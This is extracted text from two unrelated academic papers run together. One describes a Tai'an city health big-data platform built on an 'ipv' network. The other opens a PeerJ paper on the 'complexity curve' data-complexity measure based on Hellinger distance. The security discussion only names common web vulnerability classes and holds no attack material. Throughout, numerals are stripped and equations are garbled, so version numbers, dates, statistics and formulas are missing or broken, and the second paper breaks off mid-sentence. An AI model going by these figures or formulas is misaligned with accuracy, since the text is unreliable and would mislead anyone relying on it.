construction of medical and health information in feicheng city as an example. with the rapid development of it technology, soa technology, saas application, wireless network and other new technologies, the price of it equipment is getting lower and lower, which makes the construction of smart city feasible technically and economically. meanwhile, with the continuous application of cloud computing technology in the practice of medical informatization, the construction of regional medical informatization can achieve better results on this basis. international journal of advanced network, monitoring and controls volume , no. , in august , the ministry of information industry officially defined ipv as a new generation internet to distinguish ipv next-generation internet. the internet based on tcp/ip protocol has been unable to meet the needs of future development by increasing bandwidth and gradual improvement. in order to break through the future network basic theory and support a new generation of internet experiment. it is necessary to build test facilities include: original network equipment system, resource monitoring management system, covering cloud computing services, internet of things applications, spatial information network simulation, network information security. on november , , the general staff department of the people's liberation army organized the ipv technology project application seminar at the no. dacheng road in beijing. they discussed and demonstrated the application of the healthy tai’an big data ecological domain as an ipv technology application. it is required to speed up construction of the tai’an big data ecological domain and rapidly increase the scale of the ipv network, and strive to build an ipv network technology demonstration zone through healthy tai’an big data ecological domain. tai’an city "smart medicine" was achieved through the establishment of a unified data standard for health information in tai'an city, public health information resources sharing, and electronic two-way referral and inspection results in the city mutual recognition and health card application in the city. with the healthy tai’an big data ecological domain as the core, it realizes information interconnection and sharing, as well as comprehensive business collaboration. it promotes the development of a large health industry, achieves a more scientific management, smarter business, and benefits more residents, and promotes the openness of the health and family planning business in tai'an city. through the construction of this platform, the informatization construction of health and family planning in tai'an city has reached the national first-class level. ii. ecological domain system tai’an big data ecological domain can provide personalized health management and health care for residents, improve residents' satisfaction. it can provide life-cycle health information for residents, and provide residents with network and information health services and health management. it enables residents to obtain continuous, comprehensive and high-quality health care services. it improves the efficiency of health services and reduces the waiting time of residents. we will support the rational use of high-quality regional health resources; effectively resolve the rational division of labor and allocation between primary and secondary large hospitals. a. system business architecture the health tai’an big data ecosystem consists of five parts: business system layer, it basic service layer, data layer (data warehouse), application layer and service layer (internet + convenient service platform). the business systems layer includes the business systems of medical institutions, health management centers, public health institutions, and other administrative agencies. through the ipv service private network, network equipment, servers and storage equipment in the it basic service layer, data such as electronic medical records, health files, population, and health resources are stored in the data layer. we divide the platform business system into three categories according to the different roles of data usage. the first category is the internet + service platform for residents (including health tai’an website, health tai’an app, internet hospital, etc.). the second category is the medical collaborative service system for medical and health personnel (including hierarchical diagnosis and treatment platform, health identity card management system, telemedicine, health tai’an imaging/ecg/inspection/pathology, etc.). the third international journal of advanced network, monitoring and controls volume , no. , category is the medical and health supervision system which serving the medical and health administrative institutions (including the medical and health supervision platform, medical reform monitoring system, third-party regional evaluation system, etc.). meanwhile, business intelligence in data warehouse can be used to support the development of big data analysis and artificial intelligence. the entire platform architecture conforms to the international and national information standard management system and information security protection framework to ensure the consistency and security of the exchange of data. meanwhile, the remote disaster recovery and backup mode in line with international requirements is specially used to ensure the safe storage of data from natural or man-made disasters. figure . business architecture of health tai’an big data ecological domain b. overall technical architecture the health tai’an big data ecological domain database uses relational databases such as mysql, oracle, sql server, and the development language uses java and .net. the platform service is built with esb bus and soa architecture, which provides perfect technical support for big data, and realizes rapid access to massive data. the flat platform provides complete functions such as collaborative support services and configuration management, and provides a comprehensive monitoring mechanism for the operating environment, which facilitates the rapid positioning and troubleshooting of problems. the overall technical framework of the platform conforms to the national standard and standard system, and adopts the data exchange standard of the industry standard, and adopts a variety of security mechanisms and security technologies to ensure the stable operation of the platform. international journal of advanced network, monitoring and controls volume , no. , figure . technical architecture of health tai’an big data ecological domain ) soa architecture support the platform adopts the micro services architectural mode. micro services are an updated version of the traditional soa architectural pattern that supports for fine-grained control. each system accessed in healthy tai’an big data ecological domain is equivalent to micro services component, which dynamically realizes service scheduling and balance through registration and discovery mechanism. in addition, each service component can deploy multiple instances, effectively improving the overall stability of the platform. a service component is a mineralized project with distributed deployment and invocation that provides a type of interface services. in terms of interface granularity division of service components, appropriate granularity should be adopted to split the interfaces to ensure the flexibility of top-level application calls and reduce the number of calls between different components to avoid complex business logic dependencies between components. ) esb bus technology esb (enterprise service bus) is the combination of traditional middleware technology and xml, web service technology. the esb provides the most basic connectivity hub in a network and is an essential element in building an enterprise nervous system. the enterprise service bus is the latest way to provide reliable, guaranteed messaging technology.esb middleware products leverage web services standards and interfaces with recognized reliable messaging protocols. common features of esb products include: connecting heterogeneous mom, encapsulating the mom protocol using the web services description language interface, and the ability to transport simple object application protocol (soap) transport streams on the mom transport layer. international journal of advanced network, monitoring and controls volume , no. , the esb uses the "bus" model to manage and simplify the integration topology between applications, based on open standards to support dynamic interconnectivity between applications at the level of messages, events, and services. the platform adopts b/s architecture and saas deployment mode, which is different from traditional medical information platform manufacturers and the overall architecture design, is more advanced and efficient. c. overall standard architecture of the platform following the unified standard, unified code, unified interface, under the principle of combing and standardized data through canonical business definition, strictly in accordance with established standards and technical route, so as to realize multiple departments, multiple system, information technology, as well as heterogeneous platform environment, interconnection, make sure that the maturity of the whole system, expansibility and adaptability, to evade the risk of system construction. under the principle of “unified specification, unified code, and unified interface”, the system strictly abides by established standards and technical routes, thereby achieving information interconnection in multi-sector, multi-system, multi-technology, and heterogeneous platform environments. figure . the standard architecture health tai’an big data ecological domain international journal of advanced network, monitoring and controls volume , no. , d. platform security architecture the platform security architecture refers to iso- and the third level of the national information security level protection system requirements. from the aspects of technology, operation and maintenance, management system and infrastructure, it is divided into security technology system, operation and maintenance security system, information security management system, security infrastructure and other parts. figure . the security architecture health tai’an big data ecological domain the security technology system is mainly divided into application security, data security, network security and host security. ) application security. application security mainly against common web security vulnerabilities published by owasp. it mainly includes sql injection, invalid authentication and authentication management, xss attacks, invalid access control, sensitive information disclosure, csrf, use of known vulnerability components, unprotected api, insufficient logging and monitoring and other web vulnerabilities. ) data security. database security relies on various technologies and management measures to ensure data security, availability, integrity and confidentiality through data encryption, data desensitization, data storage backup, and access control. ) network security. network security is mainly to ensure the integrity, confidentiality and non-repudiation of data in the process of network transmission. through data transmission process encryption, intrusion prevention guarantees network security. ) host security. host security solves the main security risks faced by the server, builds a server security protection system to prevent information leakage and risk by firewalls, white list isolation, security configuration, etc. international journal of advanced network, monitoring and controls volume , no. , iii. system network architecture the system is divided into six areas, and the core area is two huawei s data center level switch clusters. the core area is connected to all other areas using dual gigabit connections. the network topology is shown in figure . figure . topology architecture of healthy tai’an big data ecological domain network the access area is the area where all health cares institutions access. two huawei gigabit firewalls are used for isolation and aggregation. the business volume in the early stage is limited, and each of the two firewalls uses a gigabit connection, which can be expanded at any time with the business development in the future. the internal network area is centered on two ipv backbone routers and huawei data firewall. the data firewall isolates the internal network from the core switch to protect it. the establishment of virtual servers and storage devices in the internal network area is completed through optical fiber switches. the ipv router backbone router encrypts the address of the core data area of the internal network for higher security. the external network deployment has the external network firewall. the anti-attack device is deployed to further increase the security protection of the external network. platform logging, auditing, monitoring and ipv management are deployed in the management area. the security zone is used to deploy topsec vulnerability scanning, network auditing, and flow international journal of advanced network, monitoring and controls volume , no. , control devices, which mainly provide security auditing and vulnerability scanning andother protection functions for the network. iv. design of system hardware architecture the system is equipped with huawei key business server minicomputer, which is mainly used in his system. it gives full play to the characteristics of strong processing capacity and high reliability of the minicomputer to ensure the normal operation of the hospital's daily business for hours. the system is equipped with huawei high-performance data server, which serves as the city's population health records database to ensure the security of these important data. the high-performance generic server runs the lis system, supply chain system, pacs system, medical business collaboration, internet applications, and other applications. the cloud mode dynamically adjusts the computing resources of the server according to the running status of the service. each virtual machine can be used as a backup. if a hardware server fails, the service will not be affected. the hardware architecture of the system is shown in figure . figure . topology diagram of health tai’an big data ecological domain equipment. according to the outpatient volume of all levels of hospitals within tai’an region, the available storage capacity of healthy tai’an big data ecological domain is . t, which can meet the business needs in the next to years. the storage portion consists of huawei oceanstor v and huawei international journal of advanced network, monitoring and controls volume , no. , oceanstor v virtualized shared storage disk array. the system plans huaweirh hv , (cpu e - v , g memory g hard disk) server, as a silver enterprise server, deploys two independent physical machine servers. system antivirus virus database upgrade server, and system antivirus virus database requires independent physical server. v. system implementation tai’an city health big data ecological domain designed in accordance with the above framework system, it has completed the overall planning of nearly platforms and products in categories, including basic platform, medical service, health service, healthy family, business system, benefit people service, business supervision, emerging technology since its construction in . the system has completed the construction of all basic platforms, including platform standard management system, platform basic service, data exchange service, data resource service, information system integration platform, platform operation and maintenance system, platform security system. it has completed the construction of the information system of all primary medical institutions, including cloud his, cloud lis, cloud pacs, cloud emr and so on. some health services have been completed, including basic public health services and family doctor services. it has completed the construction of some business collaboration systems, including medical group/medical association/medical community/specialist alliance system, health id card management system, health record access system, two-way referral system, remote consultation system, imaging center system. it has completed the construction of some beneficial services, including health tai’an website/app, internet hospital, prescription sharing platform, pharmacy purchasing, sales and storage management system, online drug purchase management system, etc. it has completed the construction of some business supervision system, including medical and health supervision system, financial fund supervision system, medical insurance control system, etc. the detail is as follows: figure . application system module map in the above system, the financial capital clearing platform has been used in various medical and health unit in the whole city. the fourth people's hospital of tai'an city, tai'an traditional chinese medicine hospital, and wangzhuang town health center of feicheng city of medical informatization and internet + application have been comprehensively. it has been fully launched and stable, and has been highly praised by visiting experts. the fourth people's hospital of tai'an city, the wangzhuang town health center of feicheng city is applying for a typical case of the national universal medical health information platform. international journal of advanced network, monitoring and controls volume , no. , the overall platform has achieved good application results, and the operation based on ipv network platform is stable and reliable. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p].us: , . . [ ] xie jianping, xu dongmei, etc.digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] notice of the shandong provincial government on printing and distributing the work plan for the promotion of the construction of medical complex in shandong province, issued by shandong administrative office. no. [ ] [ ] notice on printing and distributing the implementation plan for promoting the construction of tai’an city medical consortium, issued by thailand administrative office. no. [ ] [ ] opinions of the shandong provincial government on the implementation of document. no. [ ] of the state council on promoting and standardizing the development of the application of big data in health care. no. [ ]. issued by the council of shandong province. [ ] notice of the national health and family planning commission on printing and distributing guidelines on the application of hospital information platform. no. of the planning letter of the national health office [ ] [ ] notice of shandong provincial health and family planning commission on the implementation of contract service for family doctors. no. [ ] [ ] notice on the -day action of internet + medical and health care for the benefit of the people. no. [ ] [ ] notice of the state council on printing and distributing the implementation and assessment program of healthy china action organization. no. [ ] submitted march accepted july published august corresponding author dariusz m. plewczynski, dariuszplewczynski@gmail.com academic editor jaume bacardit additional information and declarations can be found on page doi . /peerj-cs. copyright zubek and plewczynski distributed under creative commons cc-by . open access complexity curve: a graphical measure of data complexity and classifier performance julian zubek , and dariusz m. plewczynski centre of new technologies, university of warsaw, warsaw, poland institute of computer science, polish academy of sciences, warsaw, poland abstract we describe a method for assessing data set complexity based on the estimation of the underlining probability distribution and hellinger distance. in contrast to some popular complexity measures, it is not focused on the shape of a decision boundary in a classification task but on the amount of available data with respect to the attribute structure. complexity is expressed in terms of graphical plot, which we call complexity curve. it demonstrates the relative increase of available information with the growth of sample size. we perform theoretical and experimental examination of properties of the introduced complexity measure and show its relation to the variance component of classification error. we then compare it with popular data complexity measures on diverse data sets and show that it can contribute to explaining performance of specific classifiers on these sets. we also apply our methodology to a panel of simple benchmark data sets, demonstrating how it can be used in practice to gain insights into data characteristics. moreover, we show that the complexity curve is an effective tool for reducing the size of the training set (data pruning), allowing to significantly speed up the learning process without compromising classification accuracy. the associated code is available to download at: https://github.com/zubekj/complexity_curve (open source python implementation). subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords learning curves, data complexity, data pruning, hellinger distance, bias-variance decomposition, performance measures introduction it is common knowledge in machine learning community that the difficulty of classification problems varies greatly. sometimes it is enough to use a simple out-of-the-box classifier to get a very good result and sometimes careful preprocessing and model selection are needed to get any non-trivial result at all. the difficulty of a classification task clearly stems from certain properties of the data set, yet we still have problems with defining those properties in general. bias–variance decomposition (domingos, ) demonstrates that the error of a predic- tor can be attributed to three sources: bias, coming from the inability of an algorithm to build an adequate model for the relationship present in data; variance, coming from the inability to estimate correct model parameters from an imperfect data sample; and the how to cite this article zubek and plewczynski ( ), complexity curve: a graphical measure of data complexity and classifier perfor- mance. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:dariuszplewczynski@gmail.com mailto:dariuszplewczynski@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/zubekj/complexity_curve http://dx.doi.org/ . /peerj-cs. irreducible error component commonly called noise. following this line of reasoning, the difficulty of a classification problem may come partly from the complexity of the relation between dependent variable and explanatory variables, partly from the scarcity of infor- mation in the training sample, and partly from class ambiguity (due to noise in the target variable or an overlap between classes). this is identical to sources of classification difficulty identified by ho & basu ( ), who labelled the three components: ‘complex decision boundary,’ ‘small sample size and dimensionality induced sparsity’ and ‘ambiguous classes.’ in this article, we introduce a new measure of data complexity targeted at sample sparsity, which is mostly associated with variance error component. we aim to measure information saturation of a data set without making any assumptions on the form of the relation between dependent variable and the rest of variables, so explicitly disregarding shape of the decision boundary and classes ambiguity (e.g., caused by noise on the target variable). our complexity measure takes into account the number of samples, the number of attributes, and the internal structure of attributes under a simplifying assumption of attribute independence. the key idea is to check how well a data set can be approximated by its subsets. if the probability distribution induced by a small data sample is very similar to the probability distribution induced by the whole data set, we say that the set is saturated with information and presents an opportunity to learn the relationship between variables without promoting the variance. to operationalise this notion, we introduce two kinds of plots: • complexity curve—a plot presenting how well subsets of growing size approximate distribution of attribute values. it is a basic method applicable to clustering, regression and classification problems. • conditional complexity curve—a plot presenting how well subsets of growing size approximate conditional distribution of attribute values given class. it is applicable to classification problems and more robust against class imbalance or differences in attributes structure between classes. since the proposed measure characterise the data sample itself without making any assumptions as to how that sample will be used, it should be applicable to all kinds of problems involving reasoning from data. in this work, we focus on classification tasks since this is the context in which data complexity measures were previously applied. we compare the area under the complexity curve with popular data complexity measures and show how it complements the existing metrics. we also demonstrate that it is useful for explaining classifier performance by showing that the area under the complexity curve is correlated with the area under the receiver operating characteristic (auc roc) for popular classifiers tested on benchmark data sets. we propose an immediate application of the developed method connected with the fundamental question: how large data sample is needed to build a successful predictor? we pursue this topic by proposing a data pruning strategy based on complexity curve and evaluating it on large data sets. we show that it can be considered as an alternative to progressive sampling strategies (provost, jensen & oates, ). zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related literature the problem of measuring data complexity in the context of machine learning is broadly discussed. our beliefs are similar to those of ho ( ), who stated the need for including data complexity analysis in algorithm comparison procedures. similar needs are also discussed in fields outside machine learning; for example, in combinatorial optimisation (smith-miles & lopes, ). the general idea is to select a sufficiently diverse set of problems to demonstrate both strengths and weaknesses of the analysed algorithms. the importance of this step was stressed by macià et al. ( ), who demonstrated how algorithm comparison may be biased by benchmark data set selection, and showed how the choice may be guided by complexity measures. characterising problem space with some metrics makes it possible to estimate regions in which certain algorithms perform well (luengo & herrera, ), and this opens up possibilities of meta-learning (smith-miles et al., ). in this context, complexity measures are used not only as predictors of classifier performance but, more importantly, as diversity measures capturing various properties of the data sets. it is useful when the measures themselves are diverse and focus on different aspects of the data to give as complete characterisation of the problem space as possible. in the later part of the article we demonstrate that complexity curve fits well into the landscape of currently used measures, offering new insights into data characteristics. a set of practical measures of data complexity with regard to classification was introduced by ho & basu ( ), and later extended by ho, basu & law ( ) and orriols-puig, macià & ho ( ). it is routinely used in tasks involving classifier evaluation (macià et al., ; luengo & herrera, ) and meta-learning (diez-pastor et al., ; mantovani et al., ). some of these measures are based on the overlap of values of specific attributes; examples include fisher’s discriminant ratio, volume of overlap region, attribute efficiency etc. the others focus directly on class separability; this group includes measures such as the fraction of points on the decision boundary, linear separability, the ratio of intra/inter class distance. in contrast to our method, such measures focus on specific properties of the classification problem, measuring shape of the decision boundary and the amount class overlap. topological measures concerned with data sparsity, such as ratio of attributes to observations, attempt to capture similar properties as our complexity curve. li & abu-mostafa ( ) defined data set complexity in the context of classification using the general concept of kolmogorov complexity. they proposed a way to measure data set complexity using the number of support vectors in support vector machine (svm) classifier. they analysed the problems of data decomposition and data pruning using above methodology. a graphical representation of the data set complexity called the complexity-error plot was also introduced. the main problem with their approach is the selection of very specific and complex machine learning algorithms, which may render the results in less universal way, and which are prone to biases specific to svms. this make their method unsuitable for diverse machine learning algorithms comparison. another approach to data complexity is to analyse it on the level of individual instances. this kind of analysis is performed by smith, martinez & giraud-carrier ( ), who zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. attempted to identify which instances are misclassified by various classification algorithm. they devised local complexity measures calculated with respect to single instances and later tried to correlate average instance hardness with global data complexity measures of ho & basu ( ). they discovered that it is mostly correlated with class overlap. this makes our work complementary, since in our complexity measure we deliberately ignore class overlap and individual instance composition to isolate another source of difficulty, namely data scarcity. yin et al. ( ) proposed a method of feature selection based on hellinger distance (a measure of similarity between probability distributions). the idea was to choose features, which conditional distributions (depending on the class) have minimal affinity. in the context of our framework, this could be interpreted as measuring data complexity for single features. the authors demonstrated experimentally that, for the high-dimensional imbalanced data sets, their method is superior to popular feature selection methods using fisher criterion, or mutual information. definitions in the following sections, we define formally all measures used throughout the paper. basic intuitions, assumptions, and implementation choices are discussed. finally, algorithms for calculating complexity curve, conditional complexity curve, and generalisation curve are given. measuring data complexity with samples in a typical machine learning scenario, we want to use information contained in a collected data sample to solve a more general problem which our data describe. problem complexity can be naturally measured by the size of a sample needed to describe the problem accurately. we call the problem complex, if we need to collect a lot of data in order to get any results. on the other hand, if a small amount of data suffices, we say the problem has low complexity. how to determine if a data sample describes the problem accurately? any problem can be described with a multivariate probability distribution p of a random vector x. from p we sample our finite data sample d. now, we can use d to build the estimated probability distribution of x–pd. pd is the approximation of p. if p and pd are identical, we know that data sample d describes the problem perfectly and collecting more observations would not give us any new information. analogously, if pd is very different from p we can be almost certain that the sample is too small. to measure similarity between probability distributions we use hellinger distance. for two continuous distributions p and pd with probability density functions p and pd it is defined as: h (p,pd)= ∫ (√ p(x)− √ pd(x) ) dx. the minimum possible distance is achieved when the distributions are identical, the maximum is achieved when any event with non-zero probability in p has probability in pd and vice versa. simplicity and naturally defined – range make hellinger distance a good measure for capturing sample information content. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in most cases, we do not know the underlining probability distribution p representing the problem and all we have is a data sample d, but we can still use the described complexity measure. let us picture our data d as the true source of knowledge about the problem and the estimated probability distribution pd as the reference distribution. any subset s⊂d can be treated as a data sample and a probability distribution ps estimated from it will be an approximation of pd. by calculating h (pd,ps) we can assess how well a given subset represent the whole available data, i.e., determine its information content. obtaining a meaningful estimation of a probability distribution from a data sample poses difficulties in practice. the probability distribution we are interested in is the joint probability on all attributes. in that context, most of the realistic data sets should be regarded as extremely sparse, and naïve probability estimation using frequencies of occurring values would result in mostly flat distribution. this can be called the curse of dimensionality. against this problem, we apply a naïve assumption that all attributes are independent. this may seem like a radical simplification but, as we will demonstrate later, it yields good results in practice and constitute a reasonable baseline for common machine learning techniques. under the independence assumption we can calculate the joint probability density function f from the marginal density functions f ,...,fn: f (x)= f (x )f (x )...fn(xn). we will now show the derived formula for hellinger distance under the independence assumption. observe that the hellinger distance for continuous variables can be expressed in another form: ∫ (√ f (x)− √ g(x) ) dx = ∫ ( f (x)− √ f (x)g(x)+g(x) ) dx = ∫ f (x) dx− ∫ √ f (x)g(x) dx+ ∫ g(x) dx = − ∫ √ f (x)g(x) dx. in the last step we used the fact the that the integral of a probability density over its domain must equal one. we will consider two multivariate distributions f and g with density functions: f (x ,...,xn)= f (x )...fn(xn) g(x ,...,xn)=g (x )...gn(xn). the last formula for hellinger distance will now expand: − ∫ ··· ∫ √ f (x ,...,xn)g(x ,...,xn)dx ...dxn = − ∫ ··· ∫ √ f (x )...fn(xn)g (x )...gn(xn)dx ...dxn = − ∫ √ f (x )g (x ) dx ... ∫ √ fn(xn)gn(xn) dxn. in this form, variables are separated and parts of the formula can be calculated separately. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. practical considerations calculating the introduced measure of similarity between data set in practice poses some difficulties. first, in the derived formula direct multiplication of probabilities occurs, which leads to problems with numerical stability. we increased the stability by switching to the following formula: − ∫ √ f (x )g (x ) dx ... ∫ √ fn(xn)gn(xn) dxn = − ( − ∫ (√ f (x )− √ g (x ) ) dx ) ... ( − ∫ (√ fn(xn)− √ gn(xn) ) dx ) = − ( −h (f ,g ) ) ... ( −h (fn,gn) ) . for continuous variables probability density function is routinely done with kernel density estimation (kde)—a classic technique for estimating the shape continuous probability density function from a finite data sample (scott, ). for a sample (x ,x ,...,xn) estimated density function has a form: f̂h(x)= nh n∑ i= k ( x−xi h ) where k is the kernel function and h is a smoothing parameter –bandwidth. in our experiments we used gaussian function as the kernel. this is a popular choice, which often yields good results in practice. the bandwidth was set according to the modified scott’s rule (scott, ): h= n− d+ , where n is the number of samples and d number of dimensions. in many cases, the independence assumption can be supported by preprocessing input data in a certain way. a very common technique, which can be applied in this situation is the whitening transform. it transforms any set of random variables into a set of uncorrelated random variables. for a random vector x with a covariance matrix a new uncorrelated vector y can be calculated as follows: =pdp− w =pd− p− y =xw where d is diagonal matrix containing eigenvalues and p is matrix of right eigenvectors of . naturally, lack of correlation does not imply independence but it nevertheless reduces the error introduced by our independence assumption. furthermore, it blurs the difference between categorical variables and continuous variables putting them on an equal footing. in all further experiments, we use whitening transform preprocessing and then treat all variables as continuous. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a more sophisticated method is a signal processing technique known as independent component analysis (ica) (hyvärinen & oja, ). it assumes that all components of an observed multivariate signal are mixtures of some independent source signals and that the distribution of the values in each source signal is non-gaussian. under these assumption, the algorithm attempts to recreate the source signals by splitting the observed signal into the components as independent as possible. even if the assumptions are not met, ica technique can reduce the impact of attributes interdependencies. because of its computational complexity, we used it as an optional step in our experiments. machine learning task difficulty our data complexity measure can be used for any type of problem described through a multivariate data sample. it is applicable to regression, classification and clustering tasks. the relation between the defined data complexity and the difficulty of a specific machine learning task has to be investigated. we will focus on the supervised learning case. classification error will be measured as mean – error (accuracy). data complexity will be measured as mean hellinger distance between the real and the estimated probability distributions of attributes conditioned on the target variable: m m∑ i= h (p(x|y =yi),pd(x|y =yi)) where x—vector of attributes, y —target variable, y ,y ,...ym—values taken by y . it has been shown that error of an arbitrary classification or regression model can be decomposed into three parts: error=bias+variance+noise. domingos ( ) proposed an universal scheme of decomposition, which can be adapted for different loss functions. for a classification problem and – loss l expected error on sample x for which the true label is t, and the predicted label given a training set d is y can be expressed as: ed,t[ (t =y)] = (et[t] =ed[y]) + c ed[ (y =ed[y])] + c et[ (t =et[t])] =b(x) + c v (x) + c n(x) where b—bias, v —variance, n—noise. coefficients c and c are added to make the decomposition consistent for different loss functions. in this case, they are equal to: c =pd(y =et[t])−pd(y =et[t])pt (y = t |et[t] = t) c = { if et[t]=ed[y] −pd(y =et[t] |y =ed[y]) otherwise. bias comes from an inability of the applied model to represent the true relation present in data, variance comes from an inability to estimate the optimal model parameters from the zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data sample, the noise is inherent to the solved task and irreducible. since our complexity measure is model agnostic, it clearly does not include bias component. as it does not take into account the dependent variable, it cannot measure noise either. all that is left to investigate is the relation between our complexity measure and variance component of the classification error. the variance error component is connected with overfitting, when the model fixates over specific properties of a data sample and looses generalisation capabilities over the whole problem domain. if the training sample represented the problem perfectly and the model was fitted with perfect optimisation procedure, variance would be reduced to zero. the less representative the training sample is for the whole problem domain, the larger the chance for variance error. this intuition can be supported by comparing our complexity measure with the error of the bayes classifier. we will show that they are closely related. let y be the target variable taking on values v ,v ,...,vm, fi(x) an estimation of p(x =x|y =vi) from a finite sample d, and g(y) an estimation of p(y =y). in such a setting, – loss of the bayes classifier on a sample x with the true label t is: (t =y)= ( t =argmaxi ( g(vi)fi(x) )) . let assume that t =vj. observe that: vj =argmax i ( g(vi)fi(x) ) ⇔∀ig(vj)fj(x)−g(vi)fi(x)≥ which for the case of equally frequent classes reduces to: ∀ifj(x)−fi(x)≥ . we can simultaneously add and subtract term p(x =x |y =vj)−p(x =x |y =vi) to obtain: ∀i ( fj(x)−p(x =x |y =vj) ) + ( p(x =x |y =vi)−fi(x) ) + ( p(x =x |y =vj)−p(x =x |y =vi) ) ≥ . we know that p(x =x|y =vj)−p(x =x|y =vi)≥ , so as long as estimations fi(x), fj(x) do not deviate too much from real distributions the inequality is satisfied. it will not be satisfied (i.e., an error will take place) only if the estimations deviate from the real distributions in a certain way (i.e., fj(x)<p(x =x|y =vj) and fi(x)>p(x =x|y =vi)) and the sum of these deviations is greater than p(x =x|y =vj)−p(x =x|y =vi). the hellinger distance between fi(x) and p(x =x|y =vi) measures the deviation. this shows that by minimising hellinger distance we are also minimising error of the bayes classifier. the converse may not be true: not all deviations of probability estimates result in classification error. in the introduced complexity measure, we assumed independency of all attributes, which is analogous to the assumption of naïve bayes. small hellinger distance between zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. class-conditioned attribute distributions induced by sets a and b means that naïve bayes trained on set a and tested on set b will have only very slight variance error component. of course, if the independence assumption is broken bias error component may still be substantial. complexity curve complexity curve is a graphical representation of a data set complexity. it is a plot presenting the expected hellinger distance between a subset and the whole set versus subset size: cc(n)=e[h (p,qn)] where p is the empirical probability distribution estimated from the whole set and qn is the probability distribution estimated from a random subset of size n≤|d|. let us observe that cc(|d|)= because p =q|d|. q is undefined, but for the sake of convenience we assume cc( )= . algorithm procedure for calculating complexity curve. d – original data set, k – number of random subsets of the specified size. . transform d with whitening transform and/or ica to obtain di . . estimate probability distribution for each attribute of di and calculate joint probabil- ity distribution – p. . for i in ...|di| (with an optional step size d): (a) for j in ...k : i. draw subset sji ⊆di such that |s j i|= i. ii. estimate probability distribution for each attribute of sji and calculate joint probability distribution – qji. iii. calculate hellinger distance: lji =h (p,qji). (b) calculate mean mi and standard error si: mi= k k∑ j= lji si= √√√√ k k∑ j= ( mi−l j i ) complexity curve is a plot of mi±si vs i. to estimate complexity curve in practice, for each subset size k random subsets are drawn and the mean value of hellinger distance, along with standard error, is marked on the plot. the algorithm presents the exact procedure. parameters k (the number of samples of a specified size) and d (sampling step size) control the trade-off between the precision of the calculated curve and the computation time. in all experiments, unless stated otherwise, we used values k = , d = |d| . regular shapes of the obtained curves did not suggest the need for using larger values. figure presents a sample complexity curve (solid lines). it demonstrates how by drawing larger subsets of the data we get better approximations of the original distribution, as indicated by the decreasing hellinger distance. the logarithmic decrease of the distance zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve (solid) and conditional complexity curve (dashed) for iris data set. is characteristic: it means that with a relatively small number of samples we can recover general characteristics of the distribution, but to model the details precisely we need a lot more data points. the shape of the curve is very regular, with just minimal variations. it means that the subset size has a far greater impact on the hellinger distance that the composition of the individual subsets. the shape of the complexity curve captures the information on the complexity of the data set. if the data is simple, it is possible to represent it relatively well with just a few instances. in such case, the complexity curve is very steep at the beginning and flattens towards the end of the plot. if the data is complex, the initial steepness of the curve is smaller. that information can be aggregated into a single parameter—the area under the complexity curve (aucc). if we express the subset size as the fraction of the whole data set, then the value of the area under the curve becomes limited to the range [ , ] and can be used as an universal measure for comparing complexity of different data sets. conditional complexity curve the complexity curve methodology presented so far deals with the complexity of a data set as a whole. while this approach gives information about data structure, it may assess complexity of the classification task incorrectly. this is because data distribution inside each of the classes may vary greatly from the overall distribution. for example, when the number of classes is larger, or the classes are imbalanced, a random sample large enough to represent the whole data set may be too small to represent some of the classes. to take this into account, we introduce conditional complexity curve. we calculate it by splitting each data sample according to the class value and taking the arithmetic mean of the complexities of each sub-sample. presents the exact procedure. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm procedure for calculating conditional complexity curve. d – original data set, c – number of classes, n – number of subsets, k – number of sam- ples. . transform d with whitening transform and/or ica to obtain di . . split di according to the class into d i,d i,...,d c i . . from d i,d i,...,d c i estimate probability distributions p ,p ,...,pc. . for i in ...|di|with a step size |di | n : (a) for j in ...k : i. draw subset sji ⊆di such that |s j i|= i. ii. split sji according to the class into s j, i ,s j, i ,...,s j,c i . iii. from sj, i ,s j, i ,...,s j,c i estimate probability distributions q j, i ,q j, i ,...,q j,c i . iv. calculate mean hellinger distance: lji = c ∑c k= h (pk,qj,ki ). (b) calculate mean mi and standard error si: mi= k k∑ j= lji si= √√√√ k k∑ j= ( mi−l j i ) conditional complexity curve is a plot of mi±si vs i. comparison of standard complexity curve and conditional complexity curve for the iris data set is given by fig. . this data set has three distinct classes. our expectation is that estimating conditional distributions for each class would require larger data samples than estimating the overall distribution. shape of the conditional complexity curve is consistent with this expectation: it is less steep than the standard curve and has larger aucc value. properties to support validity of the proposed method, we perform an in-depth analysis of its properties. we start from purely mathematical analysis, giving some intuitions on the complexity curve convergence rate and identifying border cases. then, we perform experiments with toy artificial data sets testing basic assumptions behind complexity curve. after that, we compare it experimentally with other complexity data measures and show its usefulness in explaining classifier performance. mathematical properties drawing a random subset sn from a finite data set d of size n corresponds to sampling without replacement. let assume that the data set contains k distinct values {v ,v ,...,vk} occurring with frequencies p =(p ,p ,...,pk). qn=(q ,q ,...,qk) will be a random vector which follows a multivariate hypergeometric distribution. qi= n ∑ y∈sn {y =vi}. the 